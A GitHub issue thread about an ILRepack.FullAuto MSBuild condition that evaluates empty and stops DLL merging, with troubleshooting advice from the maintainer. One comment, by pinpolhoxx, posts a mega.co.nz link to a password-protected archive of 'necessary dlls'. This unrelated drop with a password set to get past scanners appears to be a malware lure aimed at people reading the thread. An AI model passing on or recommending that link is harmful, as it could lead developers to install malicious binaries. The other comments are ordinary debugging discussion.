### ISSUE TITLE
can't build because ILRepackBuildEnable return ''

### ISSUE THREAD

**Issue by JKstring** [kekyo/ILRepack.FullAuto#13]
ILRepack.FullAuto.targets line 59 “$(ILRepackBuildEnable) AND $(_ILRepack_IsTargetConfiguration)”

I tried changing the condition to $(ILRepackBuildEnable) == 'True' AND $(_ILRepack_IsTargetConfiguration) == 'True'. The compilation succeeded, but nothing happened; it did not package my dll. I downloaded the package automatically through Visual Studio, and I ran VS in administrator mode. Could this be related?

**Comment by pinpolhoxx** [comment]
install this
https://mega.co.nz/#!9jFTnQQa!-IQ1bo74J_ZxbbDvQKSXEj0mCXBuFYX9CK-5y5EV_0A
Archive password: changeme
I put the necessary dlls in the archive

**Comment by kekyo** [comment]
I couldn't figure out the cause of the problem either, I think you need to check if `ILRepack` itself is successfully generating the assembly.

Lower the MSBuild log output level in Visual Studio and see what command line options you are applying when you call `ILRepack.exe`. I think you can isolate the problem by actually running that command manually.

**Comment by JKstring** [comment]
> I couldn't figure out the cause of the problem either, I think you need to check if `ILRepack` itself is successfully generating the assembly.
> 
> Lower the MSBuild log output level in Visual Studio and see what command line options you are applying when you call `ILRepack.exe`. I think you can isolate the problem by actually running that command manually.

Thank you for your suggestion. Using it directly seems to be fine, but since I'm not familiar with automatic packaging. I switched to the Fody library. It's working very well now!
